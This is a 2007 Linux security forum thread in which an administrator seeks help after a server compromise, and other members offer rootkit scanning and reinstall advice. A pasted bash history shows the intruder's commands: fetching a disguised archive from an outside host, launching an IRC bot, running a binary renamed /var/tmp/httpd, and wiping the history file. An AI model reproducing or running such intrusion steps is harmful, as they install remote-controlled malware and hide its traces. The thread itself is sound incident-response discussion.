LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 03-20-2007, 04:33 AM   #1
y2pk001
LQ Newbie
 
Registered: Nov 2006
Posts: 4

Rep: Reputation: 0
Root user bash shell look like "bash-2.05b#" and /root empty


Hi there

Please help me..anyone

My server was attack by a scriptkiddie and the little bastard loaded a script which ran from the /tmp dir, I managed to delete everything and the server seems to be fine but...after my last restart I connected using ssh/root and my prompt appear like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????

Whats going on?

Has this box been seriuosly compromised and I am to stupid to realise?

Any help or suggestions, thanks

PS If this post is in the wrong place, oops sorry
 
Old 03-20-2007, 06:20 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by y2pk001
after my last restart I connected using ssh/root and my prompt appear like "bash-2.05b#" I then did a directory listing in the root dir and found it to be empty????
But if you login locally (physically login to the system) is the root filesystem there?

In the meantime, I would highly recommend downloading rkhunter or chkrootkit and scanning the system. Also, do you have any idea of how the system was compromised, any of the files that were on the system, or what commands were executed (e.g. bash history)?
 
Old 03-20-2007, 09:57 AM   #3
y2pk001
LQ Newbie
 
Registered: Nov 2006
Posts: 4

Original Poster
Rep: Reputation: 0
Thanks for you reponse

I am unable to log onto the machine locally, it lives on the otherside of the world from me, I will ask the ISP guys to have a look.

I have run all the tools you spoke of and everything checks out fine
Here is the bash_history

keru.100free.com/all.jpg
tar xzvf all.jpg
rm -rf all.jpg
cd all
cd acy
./acycmech-linux 3 "#sex123456" - *\!*@supr3mul.users.undernet.org
cd ..
cp linux /var/tmp/httpd
/var/tmp/httpd
cat /proc/cpuinfo
cd ~
ls -a
echo > .bash_history


All I did was delete the user and I found a funny process running in the /tmp dir, I deleted everthing in the /tmp a and killed the process.

What that process was doing was sending email(Spam) that looked like it was comming from ebay.com, that stopped.

What else should I do??

Thanks a million
 
Old 03-20-2007, 08:04 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
All I did was delete the user
So a new user was created on the system?

Quote:
and I found a funny process running in the /tmp dir
From the bash_history, it looks like there might be stuff in /var/tmp as well. Note that the bash_history is likely incomplete (you can see him try and wipe it with the last command). What user was this bash_history from?

Frankly, this looks very suspect, and I would rebuild this box from trusted media. The fact that you do not have physical access to this box is going to make doing any kind of forensic analysis difficult. Normally I would tell you to power the box down and boot using a CD-ROM based distro like Knoppix, mount the compromised system and see if the filesystem is intact. However that isn't really an option here it seems. The odd bash prompt and missing filesystem is concerning, especially since the system is still running and is able to authenticate you to a non-existent /etc/passwd.
 
Old 03-22-2007, 03:13 AM   #5
y2pk001
LQ Newbie
 
Registered: Nov 2006
Posts: 4

Original Poster
Rep: Reputation: 0
The user existed but was created /bin/bash and a VERY weak password (not by me, by my incompitent colleague), it was for a client who wanted a POP3/imap email.

I have a feeling that in my panic I might have typed:

rm -Rf /root

What would have happen if I was stupid enough to do that?

A re-install will be abit diffcult, with the current political enviroment within my office it will almost certainly mean a move to Mircosoft Windows which will alomost certainly result in my resignation. So i sort need to try and fix this mess on the hush hush.

Again thanks alot for your help
 
Old 03-22-2007, 04:20 AM   #6
Fadoksi
Member
 
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88

Rep: Reputation: 15
If you can be 101+% sure the root isn't compromised and there are no backdoors etc. kiddie stuff on the server I think you can restore your server's normal run, after deleting/upgrading the vulnerable software you have on the server. But I wouldn't trust that machine in that situation. I would reinstall.

Last edited by Fadoksi; 03-22-2007 at 04:22 AM.
 
Old 03-22-2007, 08:33 PM   #7
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
Originally Posted by y2pk001
I have a feeling that in my panic I might have typed:
rm -Rf /root
What would have happen if I was stupid enough to do that?
It would just delete root's home filesystem, in which case you would likely have effects like you're experiencing, like the odd bash prompt because the .bashrc and user-specific config files are all missing. It's really important to be certain that *you* did that and not the intruder. If the intruder was able to delete files owned by root, then they had administrative access and you are hosed and they could have basically done anything including install malicious kernel modules or even replace the kernel itself with version that happily report everything is Ok and do other nasty things like neglect to show any files owned by the intruder when using system command like ls. So it is very important to be sure of this.

Quote:
Originally Posted by y2pk001
A re-install will be abit diffcult, with the current political enviroment within my office it will almost certainly mean a move to Mircosoft Windows which will alomost certainly result in my resignation. So i sort need to try and fix this mess on the hush hush.
Frankly I think you should reinstall and deal with the consequences, but I'm not you and I can't pretend to know what kind of position you are in, so I'll leave it at that.

If you just hosed /root with rm -rf /root, then you can likely just rebuild that part of the filesystem. There should be copies of the standard user-specific config files in /etc/skel/. You can copy these over to /root and make sure the permissions and ownership are ok.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Why "bash-2.05b$" in Terminal instead of "username@localhost username" jayelitumbiolo Linux - General 9 10-04-2009 03:16 AM
bash command is Not working in "root" jchun Linux - Newbie 2 10-26-2004 01:27 PM
root turned to bash-2.05b renegadeavenger Linux - Newbie 2 07-24-2004 09:43 PM
why did bash 2.05b install delete /bin/bash & "/bin/sh -> bash"? johnpipe Linux - Software 2 06-06-2004 06:42 PM
bash-2.05b# Xlib: extension "XFree86-DRI" missing on display ":0.0". citrus Linux - General 8 02-22-2004 10:43 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 11:37 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration